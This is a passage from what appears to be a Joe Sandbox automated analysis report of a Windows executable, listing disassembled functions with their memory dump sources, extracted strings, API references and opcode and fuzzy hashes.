                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                              • Opcode ID: de5706ddb9c62820704d84455ac3aec429d459f613738744720c6ee010884281
                                                                                                                                              • Instruction ID: c8a20e522dc5a1a7ebc143902ba225191a713f29e7140fa527ca98b9633914b0
                                                                                                                                              • Opcode Fuzzy Hash: de5706ddb9c62820704d84455ac3aec429d459f613738744720c6ee010884281
                                                                                                                                              • Instruction Fuzzy Hash: EFD24A71E082298FDB65CE68DC447EAB7B5FB45304F1441EAD81DE7240EB78AE868F41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D5F450 Relevance: 8.2, Strings: 6, Instructions: 735COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown compression method$unknown header flags set
                                                                                                                                              • API String ID: 0-3686625691
                                                                                                                                              • Opcode ID: d50504cd1134d97a5f7d6b10bac8d24576fdb12be776ea34c28c28e9bb3183f5
                                                                                                                                              • Instruction ID: 363a7bf97cfc777045e6f6ebbd57dc4cc1f60cf16d77935513ca2fd11ce29257
                                                                                                                                              • Opcode Fuzzy Hash: d50504cd1134d97a5f7d6b10bac8d24576fdb12be776ea34c28c28e9bb3183f5
                                                                                                                                              • Instruction Fuzzy Hash: 14625DB1D002159FDF14CF99C5846AEBBF1AF48309F2881AADC54AB342D775D94ACFA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00FDB75B Relevance: 3.9, Strings: 3, Instructions: 198COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4/$_Ou$wcei
                                                                                                                                              • API String ID: 0-1318479226
                                                                                                                                              • Opcode ID: 40993f33fdc3f489caf4e29b3dbc193eddd959d572a812ab94d3648276f25fc7
                                                                                                                                              • Instruction ID: e10ae33064c2b7f5dd48b365d789eff3136dc99760aa2a3b7813cd6ecfc827d5
                                                                                                                                              • Opcode Fuzzy Hash: 40993f33fdc3f489caf4e29b3dbc193eddd959d572a812ab94d3648276f25fc7
                                                                                                                                              • Instruction Fuzzy Hash: 785116F391C214AFE7097A2CEC556BABBE5EB58360F1A492DE6C5C3740E935880086C6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C971F0 Relevance: 3.5, APIs: 2, Instructions: 455COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8699a35763ac44eb22cce45b8889ca4ebfbbd05a2f808e76f48b50c83f6b4931
                                                                                                                                              • Instruction ID: 5b97809278036ba19458676d5c94a673012812e223a85f628a56f7b02568a74b
                                                                                                                                              • Opcode Fuzzy Hash: 8699a35763ac44eb22cce45b8889ca4ebfbbd05a2f808e76f48b50c83f6b4931
                                                                                                                                              • Instruction Fuzzy Hash: 3F025D71E152199BDF14CFA9C884AAEFBF1FF48314F258269E919E7341D731AA01CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D3B380 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s|%s
                                                                                                                                              • API String ID: 0-3399301454
                                                                                                                                              • Opcode ID: 8f522317544b0c3a698221fa01359d4fd03c77655e1c4475f1f0f58957fcd485
                                                                                                                                              • Instruction ID: a04b23ac23070976d68d45dba18f5417f1c53a72e2c7d54446cc58e1ef9773c4
                                                                                                                                              • Opcode Fuzzy Hash: 8f522317544b0c3a698221fa01359d4fd03c77655e1c4475f1f0f58957fcd485
                                                                                                                                              • Instruction Fuzzy Hash: 8AC1AEB1D002099FDB14DFA8DC85BAEBBB5FF48310F144259E509AB391DB70A980DFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C8DEAD Relevance: 1.5, APIs: 1, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C8D907,?,?,?,?,00D327DF), ref: 00C8DEE5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$FilePreciseSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1802150274-0
                                                                                                                                              • Opcode ID: ab65c07bdd8971068c7d9013e3980e93f52e89e70cdbbeedb073b0b6783e1620
                                                                                                                                              • Instruction ID: 2eec90e8873e0ecf6bb14083795e26f059eb7ad0c9ec705245862de3acfde14c
                                                                                                                                              • Opcode Fuzzy Hash: ab65c07bdd8971068c7d9013e3980e93f52e89e70cdbbeedb073b0b6783e1620
                                                                                                                                              • Instruction Fuzzy Hash: 94F03032908795EFCB11AF45DC41B69BBA8F708B54F00412AE812D7790DB756900CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00FDC1BF Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: }S;
                                                                                                                                              • API String ID: 0-3652442933
                                                                                                                                              • Opcode ID: 6bb490c6832159a8a8c4be906628b909f909f215026e9780e7785efb48e30293
                                                                                                                                              • Instruction ID: 4f1bd1098cc30cd685465f981c8dc4a656ef345274ee0dcd6f01fbe2f4366f76
                                                                                                                                              • Opcode Fuzzy Hash: 6bb490c6832159a8a8c4be906628b909f909f215026e9780e7785efb48e30293
                                                                                                                                              • Instruction Fuzzy Hash: F751E3F3A0D204AFE714BE29EC8577AFBE5EFA4311F06852DE6C583744EA3514048656
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00FDC8DC Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @c]
                                                                                                                                              • API String ID: 0-1688712109
                                                                                                                                              • Opcode ID: 04ef10f40eeaae3c0927556888d932ab1cf9ac14d2059325cd6faad1915dabfd
                                                                                                                                              • Instruction ID: 7ca2bc17d0b491c101e51815ef276aff24863ec9c8e6f1c196ae252e28133ce5
                                                                                                                                              • Opcode Fuzzy Hash: 04ef10f40eeaae3c0927556888d932ab1cf9ac14d2059325cd6faad1915dabfd
                                                                                                                                              • Instruction Fuzzy Hash: 1F5193F2918614AFE304AF5DDC41A7AF7E9EF98710F16882DEAC9D3300E63558508B97
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00FE3D89 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
